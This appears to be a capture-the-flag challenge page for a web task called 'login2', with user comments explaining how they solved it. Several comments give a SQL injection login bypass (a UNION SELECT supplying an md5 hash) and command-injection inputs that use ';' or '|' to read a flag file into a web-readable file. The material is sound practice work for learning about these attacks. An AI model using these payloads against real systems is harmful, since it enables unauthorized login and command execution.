login2WEB 未解决

分数: 40 金币: 6
题目作者: 未知
一  血: ShawRoot
一血奖励: 5金币
解  决: 2706
提  示: 命令执行
描  述:
login2
评论
zhuizhui 9月前

' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test

回复 0

nihaozy 11月前

学会了一个英语单词tip提示

回复 2
zpxlz 6月前

那很会学习了

回复 1

DoubleUUU 1年前

一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT "admin","202cb962ac59075b964b07152d234b70" -- &password = 123

回复 0

liuguowang75 1年前

登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,

回复 0

sunset2004 1年前

username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt

回复 3

Zhou_re-pwn 1年前

没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示

回复 0

Yoruko39 1年前

sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可

回复 0

toonavy 1年前

进程监控系统 输入需要检测的服务 ,退币!!!

回复 0

Zhumeng 1年前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 0

Zhumeng 1年前

这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag

回复 2

WriteUp

image
harry

6 金币

评分(10)

解题动态

xuyuyan999 攻破了该题 17小时前
anton_小金鱼 攻破了该题 22小时前
zuaiyio 攻破了该题 1天前
1166 攻破了该题 1天前
提姆邓肯 攻破了该题 2天前
不想吃肥肉 攻破了该题 2天前
xym 攻破了该题 2天前
BugKuYali 攻破了该题 2天前
malajiba 攻破了该题 2天前
lappland 攻破了该题 2天前
Kernel1 攻破了该题 3天前
hds 攻破了该题 3天前
bugfuck2 攻破了该题 3天前
kyzz 攻破了该题 4天前
依旧是偏爱 攻破了该题 4天前
JFeng2048 攻破了该题 4天前
wujita01 攻破了该题 5天前
小崔 攻破了该题 5天前
249190331 攻破了该题 5天前
cha8e1 攻破了该题 5天前
问题反馈